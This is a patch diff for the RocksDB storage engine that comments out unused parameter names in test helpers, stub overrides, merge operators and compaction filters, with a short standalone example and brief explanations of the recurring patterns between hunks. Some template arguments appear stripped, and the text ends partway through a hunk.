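int main() {
  int bg_delete_file = 0;
  // This callback only counts invocations and ignores its payload, so the
  // parameter is left unnamed to keep -Wunused-parameter quiet.
  std::function<void(void*)> on_delete = [&](void* /*arg*/) {
    bg_delete_file++;
  };
  on_delete(nullptr);
  std::cout << "deletes observed: " << bg_delete_file << "\n";  // prints 1
  return 0;
}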
diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc
index dac5182452b..aa81992666a 100644
--- a/util/file_reader_writer_test.cc
+++ b/util/file_reader_writer_test.cc
@@ -26,9 +26,7 @@ TEST_F(WritableFileWriterTest, RangeSync) {
       size_ += data.size();
       return Status::OK();
     }
-    virtual Status Truncate(uint64_t size) override {
-      return Status::OK();
-    }
+    virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); }
     Status Close() override {
       EXPECT_GE(size_, last_synced_ + kMb);
       EXPECT_LT(size_, last_synced_ + 2 * kMb);
@@ -39,17 +37,21 @@ TEST_F(WritableFileWriterTest, RangeSync) {
     Status Flush() override { return Status::OK(); }
     Status Sync() override { return Status::OK(); }
     Status Fsync() override { return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override {}
+    void SetIOPriority(Env::IOPriority /*pri*/) override {}
     uint64_t GetFileSize() override { return size_; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {}
-    size_t GetUniqueId(char* id, size_t max_size) const override { return 0; }
-    Status InvalidateCache(size_t offset, size_t length) override {
+    void GetPreallocationStatus(size_t* /*block_size*/,
+                                size_t* /*last_allocated_block*/) override {}
+    size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override {
+      return 0;
+    }
+    Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override {
       return Status::OK();
     }

   protected:
-    Status Allocate(uint64_t offset, uint64_t len) override { return Status::OK(); }
+    Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) override {
+      return Status::OK();
+    }
     Status RangeSync(uint64_t offset, uint64_t nbytes) override {
       EXPECT_EQ(offset % 4096, 0u);
       EXPECT_EQ(nbytes % 4096, 0u);
@@ -119,12 +121,14 @@ TEST_F(WritableFileWriterTest, IncrementalBuffer) {
     Status Flush() override { return Status::OK(); }
     Status Sync() override { return Status::OK(); }
     Status Fsync() override { return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override {}
+    void SetIOPriority(Env::IOPriority /*pri*/) override {}
     uint64_t GetFileSize() override { return size_; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {}
-    size_t GetUniqueId(char* id, size_t max_size) const override { return 0; }
-    Status InvalidateCache(size_t offset, size_t length) override {
+    void GetPreallocationStatus(size_t* /*block_size*/,
+                                size_t* /*last_allocated_block*/) override {}
+    size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override {
+      return 0;
+    }
+    Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override {
       return Status::OK();
     }
     bool use_direct_io() const override { return use_direct_io_; }
@@ -174,13 +178,13 @@ TEST_F(WritableFileWriterTest, AppendStatusReturn) {
     explicit FakeWF() : use_direct_io_(false), io_error_(false) {}

     virtual bool use_direct_io() const override { return use_direct_io_; }
-    Status Append(const Slice& data) override {
+    Status Append(const Slice& /*data*/) override {
       if (io_error_) {
         return Status::IOError("Fake IO error");
       }
       return Status::OK();
     }
-    Status PositionedAppend(const Slice& data, uint64_t) override {
+    Status PositionedAppend(const Slice& /*data*/, uint64_t) override {
       if (io_error_) {
         return Status::IOError("Fake IO error");
       }
diff --git a/util/slice.cc b/util/slice.cc
index 8d95a8ae19d..eed59657f86 100644
--- a/util/slice.cc
+++ b/util/slice.cc
@@ -74,7 +74,7 @@ class CappedPrefixTransform : public SliceTransform {
     return Slice(src.data(), std::min(cap_len_, src.size()));
   }

-  virtual bool InDomain(const Slice& src) const override { return true; }
+  virtual bool InDomain(const Slice& /*src*/) const override { return true; }

   virtual bool InRange(const Slice& dst) const override {
     return (dst.size() <= cap_len_);
@@ -93,11 +93,11 @@ class NoopTransform : public SliceTransform {

   virtual Slice Transform(const Slice& src) const override { return src; }

-  virtual bool InDomain(const Slice& src) const override { return true; }
+  virtual bool InDomain(const Slice& /*src*/) const override { return true; }

-  virtual bool InRange(const Slice& dst) const override { return true; }
+  virtual bool InRange(const Slice& /*dst*/) const override { return true; }

-  virtual bool SameResultWhenAppended(const Slice& prefix) const override {
+  virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const override {
     return false;
   }
 };
diff --git a/util/testutil.cc b/util/testutil.cc
index f3010f3f2c0..5164101441d 100644
--- a/util/testutil.cc
+++ b/util/testutil.cc
@@ -107,12 +107,12 @@ class Uint64ComparatorImpl : public Comparator {
     }
   }

-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {
+  virtual void FindShortestSeparator(std::string* /*start*/,
+                                     const Slice& /*limit*/) const override {
     return;
   }

-  virtual void FindShortSuccessor(std::string* key) const override {
+  virtual void FindShortSuccessor(std::string* /*key*/) const override {
     return;
   }
 };
diff --git a/util/testutil.h b/util/testutil.h
index 02bfb0ff6d2..069b883f285 100644
--- a/util/testutil.h
+++ b/util/testutil.h
@@ -121,10 +121,10 @@ class SimpleSuffixReverseComparator : public Comparator {
       return -(suffix_a.compare(suffix_b));
     }
   }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
+  virtual void FindShortestSeparator(std::string* /*start*/,
+                                     const Slice& /*limit*/) const override {}

-  virtual void FindShortSuccessor(std::string* key) const override {}
+  virtual void FindShortSuccessor(std::string* /*key*/) const override {}
 };

 // Returns a user key comparator that can be used for comparing two uint64_t
@@ -255,7 +255,8 @@ class RandomRWStringSink : public RandomRWFile {
     return Status::OK();
   }

-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const {
+  Status Read(uint64_t offset, size_t n, Slice* result,
+              char* /*scratch*/) const {
     *result = Slice(nullptr, 0);
     if (offset < ss_->contents_.size()) {
       size_t str_res_sz =
@@ -376,7 +377,7 @@ class StringSource: public RandomAccessFile {
 class NullLogger : public Logger {
  public:
   using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {}
+  virtual void Logv(const char* /*format*/, va_list /*ap*/) override {}
   virtual size_t GetLogFileSize() const override { return 0; }
 };

@@ -457,15 +458,16 @@ class FilterNumber : public CompactionFilter {

   std::string last_merge_operand_key() { return last_merge_operand_key_; }

-  bool Filter(int level, const rocksdb::Slice& key, const rocksdb::Slice& value,
-              std::string* new_value, bool* value_changed) const override {
+  bool Filter(int /*level*/, const rocksdb::Slice& /*key*/,
+              const rocksdb::Slice& value, std::string* /*new_value*/,
+              bool* /*value_changed*/) const override {
     if (value.size() == sizeof(uint64_t)) {
       return num_ == DecodeFixed64(value.data());
     }
     return true;
   }

-  bool FilterMergeOperand(int level, const rocksdb::Slice& key,
+  bool FilterMergeOperand(int /*level*/, const rocksdb::Slice& key,
                           const rocksdb::Slice& value) const override {
     last_merge_operand_key_ = key.ToString();
     if (value.size() == sizeof(uint64_t)) {
@@ -563,7 +565,7 @@ class StringEnv : public EnvWrapper {

   // The following text is boilerplate that forwards all methods to target()
   Status NewSequentialFile(const std::string& f, unique_ptr* r,
-                           const EnvOptions& options) override {
+                           const EnvOptions& /*options*/) override {
     auto iter = files_.find(f);
     if (iter == files_.end()) {
       return Status::NotFound("The specified file does not exist", f);
     }
@@ -571,13 +573,13 @@ class StringEnv : public EnvWrapper {
     r->reset(new SeqStringSource(iter->second));
     return Status::OK();
   }
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr* r,
-                             const EnvOptions& options) override {
+  Status NewRandomAccessFile(const std::string& /*f*/,
+                             unique_ptr* /*r*/,
+                             const EnvOptions& /*options*/) override {
     return Status::NotSupported();
   }
   Status NewWritableFile(const std::string& f, unique_ptr* r,
-                         const EnvOptions& options) override {
+                         const EnvOptions& /*options*/) override {
     auto iter = files_.find(f);
     if (iter != files_.end()) {
       return Status::IOError("The specified file already exists", f);
     }
@@ -585,8 +587,8 @@ class StringEnv : public EnvWrapper {
     r->reset(new StringSink(&files_[f]));
     return Status::OK();
   }
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr* result) override {
+  virtual Status NewDirectory(const std::string& /*name*/,
+                              unique_ptr* /*result*/) override {
     return Status::NotSupported();
   }
   Status FileExists(const std::string& f) override {
@@ -595,21 +597,21 @@ class StringEnv : public EnvWrapper {
     }
     return Status::OK();
   }
-  Status GetChildren(const std::string& dir,
-                     std::vector* r) override {
+  Status GetChildren(const std::string& /*dir*/,
+                     std::vector* /*r*/) override {
     return Status::NotSupported();
   }
   Status DeleteFile(const std::string& f) override {
     files_.erase(f);
     return Status::OK();
   }
-  Status CreateDir(const std::string& d) override {
+  Status CreateDir(const std::string& /*d*/) override {
     return Status::NotSupported();
   }
-  Status CreateDirIfMissing(const std::string& d) override {
+  Status CreateDirIfMissing(const std::string& /*d*/) override {
     return Status::NotSupported();
   }
-  Status DeleteDir(const std::string& d) override {
+  Status DeleteDir(const std::string& /*d*/) override {
     return Status::NotSupported();
   }
   Status GetFileSize(const std::string& f, uint64_t* s) override {
@@ -621,24 +623,25 @@ class StringEnv : public EnvWrapper {
     return Status::OK();
   }

-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override {
+  Status GetFileModificationTime(const std::string& /*fname*/,
+                                 uint64_t* /*file_mtime*/) override {
     return Status::NotSupported();
   }
-  Status RenameFile(const std::string& s, const std::string& t) override {
+  Status RenameFile(const std::string& /*s*/,
+                    const std::string& /*t*/) override {
     return Status::NotSupported();
   }
-  Status LinkFile(const std::string& s, const std::string& t) override {
+  Status LinkFile(const std::string& /*s*/, const std::string& /*t*/) override {
     return Status::NotSupported();
   }
-  Status LockFile(const std::string& f, FileLock** l) override {
+  Status LockFile(const std::string& /*f*/, FileLock** /*l*/) override {
     return Status::NotSupported();
   }
-  Status UnlockFile(FileLock* l) override { return Status::NotSupported(); }
+  Status UnlockFile(FileLock* /*l*/) override { return Status::NotSupported(); }

 protected:
   std::unordered_map files_;
@@ -661,14 +664,14 @@ class ChanglingMergeOperator : public MergeOperator {

   void SetName(const std::string& name) { name_ = name; }

-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
+  virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/,
+                           MergeOperationOutput* /*merge_out*/) const override {
     return false;
   }
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
+  virtual bool PartialMergeMulti(const Slice& /*key*/,
+                                 const std::deque& /*operand_list*/,
+                                 std::string* /*new_value*/,
+                                 Logger* /*logger*/) const override {
     return false;
   }
   virtual const char* Name() const override { return name_.c_str(); }
@@ -689,8 +692,9 @@ class ChanglingCompactionFilter : public CompactionFilter {

   void SetName(const std::string& name) { name_ = name; }

-  bool Filter(int level, const Slice& key, const Slice& existing_value,
-              std::string* new_value, bool* value_changed) const override {
+  bool Filter(int /*level*/, const Slice& /*key*/,
+              const Slice& /*existing_value*/, std::string* /*new_value*/,
+              bool* /*value_changed*/) const override {
     return false;
   }

@@ -713,7 +717,7 @@ class ChanglingCompactionFilterFactory : public CompactionFilterFactory {
   void SetName(const std::string& name) { name_ = name; }

   std::unique_ptr CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
+      const CompactionFilter::Context& /*context*/) override {
     return std::unique_ptr();
   }
diff --git a/util/thread_local_test.cc b/util/thread_local_test.cc
index 6fee5eaa574..789be83d8fd 100644
--- a/util/thread_local_test.cc
+++ b/util/thread_local_test.cc
@@ -535,7 +535,7 @@ TEST_F(ThreadLocalTest, CompareAndSwap) {

 namespace {

-void* AccessThreadLocal(void* arg) {
+void* AccessThreadLocal(void* /*arg*/) {
   TEST_SYNC_POINT("AccessThreadLocal:Start");
   ThreadLocalPtr tlp;
   tlp.Reset(new std::string("hello RocksDB"));
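The StringEnv hunks above show another recurring shape: stub overrides that unconditionally return NotSupported read none of their arguments, so every parameter is anonymized at once. A minimal sketch with stand-in Status and Env types (not the rocksdb classes):

#include <string>

struct Status {
  static Status OK() { return Status(); }
  static Status NotSupported() { return Status(); }
};

class Env {
 public:
  virtual ~Env() {}
  virtual Status CreateDir(const std::string& dirname) = 0;
  virtual Status RenameFile(const std::string& src,
                            const std::string& target) = 0;
};

// A read-only environment: mutating calls are stubbed out, so none of the
// parameters are read and all of them are left unnamed.
class ReadOnlyEnv : public Env {
 public:
  Status CreateDir(const std::string& /*dirname*/) override {
    return Status::NotSupported();
  }
  Status RenameFile(const std::string& /*src*/,
                    const std::string& /*target*/) override {
    return Status::NotSupported();
  }
};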
diff --git a/utilities/backupable/backupable_db.cc b/utilities/backupable/backupable_db.cc
index 8921309e469..53f450dac43 100644
--- a/utilities/backupable/backupable_db.cc
+++ b/utilities/backupable/backupable_db.cc
@@ -754,7 +754,7 @@ Status BackupEngineImpl::CreateNewBackupWithMetadata(
   uint64_t sequence_number = 0;
   s = checkpoint.CreateCustomCheckpoint(
       db->GetDBOptions(),
-      [&](const std::string& src_dirname, const std::string& fname,
+      [&](const std::string& /*src_dirname*/, const std::string& /*fname*/,
           FileType) {
         // custom checkpoint will switch to calling copy_file_cb after it sees
         // NotSupported returned from link_file_cb.
diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc
index be20a8d9b3d..8b68c215310 100644
--- a/utilities/backupable/backupable_db_test.cc
+++ b/utilities/backupable/backupable_db_test.cc
@@ -57,7 +57,8 @@ class DummyDB : public StackableDB {
   }

   using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
+  virtual Options GetOptions(
+      ColumnFamilyHandle* /*column_family*/) const override {
     return options_;
   }

@@ -65,7 +66,7 @@ class DummyDB : public StackableDB {
     return DBOptions(options_);
   }

-  virtual Status EnableFileDeletions(bool force) override {
+  virtual Status EnableFileDeletions(bool /*force*/) override {
     EXPECT_TRUE(!deletions_enabled_);
     deletions_enabled_ = true;
     return Status::OK();
@@ -78,7 +79,7 @@ class DummyDB : public StackableDB {
   }

   virtual Status GetLiveFiles(std::vector& vec, uint64_t* mfs,
-                              bool flush_memtable = true) override {
+                              bool /*flush_memtable*/ = true) override {
     EXPECT_TRUE(!deletions_enabled_);
     vec = live_files_;
     *mfs = 100;
@@ -135,7 +136,7 @@ class DummyDB : public StackableDB {
   }

   // To avoid FlushWAL called on stacked db which is nullptr
-  virtual Status FlushWAL(bool sync) override { return Status::OK(); }
+  virtual Status FlushWAL(bool /*sync*/) override { return Status::OK(); }

   std::vector live_files_;
   // pair
@@ -521,7 +522,7 @@ class BackupableDBTest : public testing::Test {

   void OpenDBAndBackupEngineShareWithChecksum(
       bool destroy_old_data = false, bool dummy = false,
-      bool share_table_files = true, bool share_with_checksums = false) {
+      bool /*share_table_files*/ = true, bool share_with_checksums = false) {
     backupable_options_->share_files_with_checksum = share_with_checksums;
     OpenDBAndBackupEngine(destroy_old_data, dummy, share_with_checksums);
   }
diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h
index f45a42f60a9..0b101e968f6 100644
--- a/utilities/blob_db/blob_db.h
+++ b/utilities/blob_db/blob_db.h
@@ -147,9 +147,9 @@ class BlobDB : public StackableDB {
                         const Slice& key) override = 0;

   using rocksdb::StackableDB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
+  virtual Status Merge(const WriteOptions& /*options*/,
+                       ColumnFamilyHandle* /*column_family*/,
+                       const Slice& /*key*/, const Slice& /*value*/) override {
     return Status::NotSupported("Not supported operation in blob db.");
   }
diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc
index 1dd72b6bc3a..e1648271170 100644
--- a/utilities/blob_db/blob_db_impl.cc
+++ b/utilities/blob_db/blob_db_impl.cc
@@ -143,8 +143,9 @@ void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) {
 }

 WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound(
-    unsigned long long log_number, const std::string& log_file_name,
-    const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) {
+    unsigned long long /*log_number*/, const std::string& /*log_file_name*/,
+    const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/,
+    bool* /*batch_changed*/) {
   return WalFilter::WalProcessingOption::kContinueProcessing;
 }

@@ -158,7 +159,7 @@ bool blobf_compare_ttl::operator()(const std::shared_ptr& lhs,
 }

 void EvictAllVersionsCompactionListener::InternalListener::OnCompaction(
-    int level, const Slice& key,
+    int /*level*/, const Slice& key,
     CompactionEventListener::CompactionListenerValueType value_type,
     const Slice& existing_value, const SequenceNumber& sn, bool is_new) {
   if (!is_new &&
@@ -354,7 +355,7 @@ void BlobDBImpl::StartBackgroundTasks() {

 void BlobDBImpl::Shutdown() { shutdown_.store(true); }

-void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) {
+void BlobDBImpl::OnFlushBeginHandler(DB* /*db*/, const FlushJobInfo& /*info*/) {
   if (shutdown_.load()) return;

   // a callback that happens too soon needs to be ignored
@@ -1395,7 +1396,7 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) {
 }

 std::pair BlobDBImpl::CloseSeqWrite(
-    std::shared_ptr bfile, bool aborted) {
+    std::shared_ptr bfile, bool /*aborted*/) {
   {
     WriteLock wl(&mutex_);

@@ -2051,7 +2052,7 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) {
 }

 std::pair BlobDBImpl::RemoveTimerQ(TimerQueue* tq,
-                                                 bool aborted) {
+                                                 bool /*aborted*/) {
   WriteLock wl(&mutex_);
   for (auto itr = cb_threads_.begin(); itr != cb_threads_.end(); ++itr) {
     if ((*itr).get() != tq) continue;
diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc
index 3931c8669b2..09c329a0565 100644
--- a/utilities/blob_db/blob_log_reader.cc
+++ b/utilities/blob_db/blob_log_reader.cc
@@ -41,7 +41,7 @@ Status Reader::ReadHeader(BlobLogHeader* header) {
 }

 Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level,
-                          WALRecoveryMode wal_recovery_mode) {
+                          WALRecoveryMode /*wal_recovery_mode*/) {
   record->Clear();
   buffer_.clear();
   backing_store_[0] = '\0';
diff --git a/utilities/checkpoint/checkpoint_impl.cc b/utilities/checkpoint/checkpoint_impl.cc
index 0cdddbd628d..c1cea914b16 100644
--- a/utilities/checkpoint/checkpoint_impl.cc
+++ b/utilities/checkpoint/checkpoint_impl.cc
@@ -37,8 +37,8 @@ Status Checkpoint::Create(DB* db, Checkpoint** checkpoint_ptr) {
   return Status::OK();
 }

-Status Checkpoint::CreateCheckpoint(const std::string& checkpoint_dir,
-                                    uint64_t log_size_for_flush) {
+Status Checkpoint::CreateCheckpoint(const std::string& /*checkpoint_dir*/,
+                                    uint64_t /*log_size_for_flush*/) {
   return Status::NotSupported("");
 }
diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc
index 56c8c6e0505..ef39541961e 100644
--- a/utilities/checkpoint/checkpoint_test.cc
+++ b/utilities/checkpoint/checkpoint_test.cc
@@ -370,7 +370,7 @@ TEST_F(CheckpointTest, CheckpointCFNoFlush) {
   Status s;
   // Take a snapshot
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCallFlush:start", [&](void* arg) {
+      "DBImpl::BackgroundCallFlush:start", [&](void* /*arg*/) {
         // Flush should never trigger.
         FAIL();
       });
diff --git a/utilities/col_buf_decoder.h b/utilities/col_buf_decoder.h
index e795e4ecdfc..918f87f9452 100644
--- a/utilities/col_buf_decoder.h
+++ b/utilities/col_buf_decoder.h
@@ -23,7 +23,7 @@ struct ColDeclaration;
 class ColBufDecoder {
  public:
   virtual ~ColBufDecoder() = 0;
-  virtual size_t Init(const char* src) { return 0; }
+  virtual size_t Init(const char* /*src*/) { return 0; }
   virtual size_t Decode(const char* src, char** dest) = 0;
   static ColBufDecoder* NewColBufDecoder(const ColDeclaration& col_declaration);
diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
index 43a25293456..49760ba5a97 100644
--- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
+++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
@@ -16,12 +16,11 @@ const char* RemoveEmptyValueCompactionFilter::Name() const {
   return "RemoveEmptyValueCompactionFilter";
 }

-bool RemoveEmptyValueCompactionFilter::Filter(int level,
-    const Slice& key,
-    const Slice& existing_value,
-    std::string* new_value,
-    bool* value_changed) const {
-
+bool RemoveEmptyValueCompactionFilter::Filter(int /*level*/,
+                                              const Slice& /*key*/,
+                                              const Slice& existing_value,
+                                              std::string* /*new_value*/,
+                                              bool* /*value_changed*/) const {
   // remove kv pairs that have empty values
   return existing_value.empty();
 }
diff --git a/utilities/document/document_db.cc b/utilities/document/document_db.cc
index f7b5b3b2f3d..ac36f0e7696 100644
--- a/utilities/document/document_db.cc
+++ b/utilities/document/document_db.cc
@@ -1038,24 +1038,25 @@ class DocumentDBImpl : public DocumentDB {

   // RocksDB functions
   using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override {
+  virtual Status Get(const ReadOptions& /*options*/,
+                     ColumnFamilyHandle* /*column_family*/,
+                     const Slice& /*key*/, PinnableSlice* /*value*/) override {
     return Status::NotSupported("");
   }
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     std::string* value) override {
+  virtual Status Get(const ReadOptions& /*options*/, const Slice& /*key*/,
+                     std::string* /*value*/) override {
     return Status::NotSupported("");
   }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
+  virtual Status Write(const WriteOptions& /*options*/,
+                       WriteBatch* /*updates*/) override {
     return Status::NotSupported("");
   }
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
+  virtual Iterator* NewIterator(
+      const ReadOptions& /*options*/,
+      ColumnFamilyHandle* /*column_family*/) override {
     return nullptr;
   }
-  virtual Iterator* NewIterator(const ReadOptions& options) override {
+  virtual Iterator* NewIterator(const ReadOptions& /*options*/) override {
     return nullptr;
   }
diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc
index 06e233fe89d..ff7b2a75a34 100644
--- a/utilities/merge_operators/max.cc
+++ b/utilities/merge_operators/max.cc
@@ -36,9 +36,9 @@ class MaxOperator : public MergeOperator {
     return true;
   }

-  virtual bool PartialMerge(const Slice& key, const Slice& left_operand,
+  virtual bool PartialMerge(const Slice& /*key*/, const Slice& left_operand,
                             const Slice& right_operand, std::string* new_value,
-                            Logger* logger) const override {
+                            Logger* /*logger*/) const override {
     if (left_operand.compare(right_operand) >= 0) {
       new_value->assign(left_operand.data(), left_operand.size());
     } else {
@@ -47,10 +47,10 @@ class MaxOperator : public MergeOperator {
     return true;
   }

-  virtual bool PartialMergeMulti(const Slice& key,
+  virtual bool PartialMergeMulti(const Slice& /*key*/,
                                  const std::deque& operand_list,
                                  std::string* new_value,
-                                 Logger* logger) const override {
+                                 Logger* /*logger*/) const override {
     Slice max;
     for (const auto& operand : operand_list) {
       if (max.compare(operand) < 0) {
diff --git a/utilities/merge_operators/put.cc b/utilities/merge_operators/put.cc
index 7f206ad3b09..fcbf67d9b03 100644
--- a/utilities/merge_operators/put.cc
+++ b/utilities/merge_operators/put.cc
@@ -22,11 +22,10 @@ namespace { // anonymous namespace
 // From the client-perspective, semantics are the same.
 class PutOperator : public MergeOperator {
  public:
-  virtual bool FullMerge(const Slice& key,
-                         const Slice* existing_value,
+  virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/,
                          const std::deque& operand_sequence,
                          std::string* new_value,
-                         Logger* logger) const override {
+                         Logger* /*logger*/) const override {
     // Put basically only looks at the current/latest value
     assert(!operand_sequence.empty());
     assert(new_value != nullptr);
@@ -34,20 +33,18 @@ class PutOperator : public MergeOperator {
     return true;
   }

-  virtual bool PartialMerge(const Slice& key,
-                            const Slice& left_operand,
-                            const Slice& right_operand,
-                            std::string* new_value,
-                            Logger* logger) const override {
+  virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/,
+                            const Slice& right_operand, std::string* new_value,
+                            Logger* /*logger*/) const override {
     new_value->assign(right_operand.data(), right_operand.size());
     return true;
   }

   using MergeOperator::PartialMergeMulti;
-  virtual bool PartialMergeMulti(const Slice& key,
+  virtual bool PartialMergeMulti(const Slice& /*key*/,
                                  const std::deque& operand_list,
-                                 std::string* new_value, Logger* logger) const
-      override {
+                                 std::string* new_value,
+                                 Logger* /*logger*/) const override {
     new_value->assign(operand_list.back().data(), operand_list.back().size());
     return true;
   }
@@ -58,10 +55,10 @@ class PutOperator : public MergeOperator {
 };

 class PutOperatorV2 : public PutOperator {
-  virtual bool FullMerge(const Slice& key, const Slice* existing_value,
-                         const std::deque& operand_sequence,
-                         std::string* new_value,
-                         Logger* logger) const override {
+  virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/,
+                         const std::deque& /*operand_sequence*/,
+                         std::string* /*new_value*/,
+                         Logger* /*logger*/) const override {
     assert(false);
     return false;
   }
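In the PutOperator hunks above, PartialMerge keeps only right_operand and new_value named because last-write-wins semantics discard everything else. The same shape in a self-contained sketch (simplified Slice and merge interface, not the rocksdb ones):

#include <cstddef>
#include <deque>
#include <string>

struct Slice {
  const char* data_;
  size_t size_;
  const char* data() const { return data_; }
  size_t size() const { return size_; }
};

class MergeOperatorBase {
 public:
  virtual ~MergeOperatorBase() {}
  virtual bool PartialMerge(const Slice& key, const Slice& left_operand,
                            const Slice& right_operand,
                            std::string* new_value) const = 0;
};

class LastWriteWins : public MergeOperatorBase {
 public:
  bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/,
                    const Slice& right_operand,
                    std::string* new_value) const override {
    // The newest operand wins; the key and the older operand are ignored by
    // design, so their names are commented out.
    new_value->assign(right_operand.data(), right_operand.size());
    return true;
  }
};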
assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/string_append/stringappend2.cc b/utilities/merge_operators/string_append/stringappend2.cc index 2d7b7423ce8..6e46d80a139 100644 --- a/utilities/merge_operators/string_append/stringappend2.cc +++ b/utilities/merge_operators/string_append/stringappend2.cc @@ -68,16 +68,16 @@ bool StringAppendTESTOperator::FullMergeV2( } bool StringAppendTESTOperator::PartialMergeMulti( - const Slice& key, const std::deque& operand_list, - std::string* new_value, Logger* logger) const { + const Slice& /*key*/, const std::deque& /*operand_list*/, + std::string* /*new_value*/, Logger* /*logger*/) const { return false; } // A version of PartialMerge that actually performs "partial merging". // Use this to simulate the exact behaviour of the StringAppendOperator. bool StringAppendTESTOperator::_AssocPartialMergeMulti( - const Slice& key, const std::deque& operand_list, - std::string* new_value, Logger* logger) const { + const Slice& /*key*/, const std::deque& operand_list, + std::string* new_value, Logger* /*logger*/) const { // Clear the *new_value for writing assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/uint64add.cc b/utilities/merge_operators/uint64add.cc index d7821737517..dc761e74b20 100644 --- a/utilities/merge_operators/uint64add.cc +++ b/utilities/merge_operators/uint64add.cc @@ -20,10 +20,8 @@ namespace { // anonymous namespace // Implemented as an AssociativeMergeOperator for simplicity and example. class UInt64AddOperator : public AssociativeMergeOperator { public: - virtual bool Merge(const Slice& key, - const Slice* existing_value, - const Slice& value, - std::string* new_value, + virtual bool Merge(const Slice& /*key*/, const Slice* existing_value, + const Slice& value, std::string* new_value, Logger* logger) const override { uint64_t orig_value = 0; if (existing_value){ diff --git a/utilities/object_registry_test.cc b/utilities/object_registry_test.cc index 40fb387bc93..fe69d9a3959 100644 --- a/utilities/object_registry_test.cc +++ b/utilities/object_registry_test.cc @@ -18,13 +18,14 @@ class EnvRegistryTest : public testing::Test { int EnvRegistryTest::num_a = 0; int EnvRegistryTest::num_b = 0; -static Registrar test_reg_a("a://.*", [](const std::string& uri, - std::unique_ptr* env_guard) { - ++EnvRegistryTest::num_a; - return Env::Default(); -}); +static Registrar test_reg_a("a://.*", + [](const std::string& /*uri*/, + std::unique_ptr* /*env_guard*/) { + ++EnvRegistryTest::num_a; + return Env::Default(); + }); -static Registrar test_reg_b("b://.*", [](const std::string& uri, +static Registrar test_reg_b("b://.*", [](const std::string& /*uri*/, std::unique_ptr* env_guard) { ++EnvRegistryTest::num_b; // Env::Default() is a singleton so we can't grant ownership directly to the diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc index 86b382cfab5..39fbec52b47 100644 --- a/utilities/options/options_util_test.cc +++ b/utilities/options/options_util_test.cc @@ -102,22 +102,22 @@ class DummyTableFactory : public TableFactory { virtual const char* Name() const { return "DummyTableFactory"; } - virtual Status NewTableReader(const TableReaderOptions& table_reader_options, - unique_ptr&& file, - uint64_t file_size, - unique_ptr* table_reader, - bool prefetch_index_and_filter_in_cache) const { + virtual Status NewTableReader( + const TableReaderOptions& /*table_reader_options*/, + unique_ptr&& /*file*/, uint64_t /*file_size*/, + unique_ptr* /*table_reader*/, + 
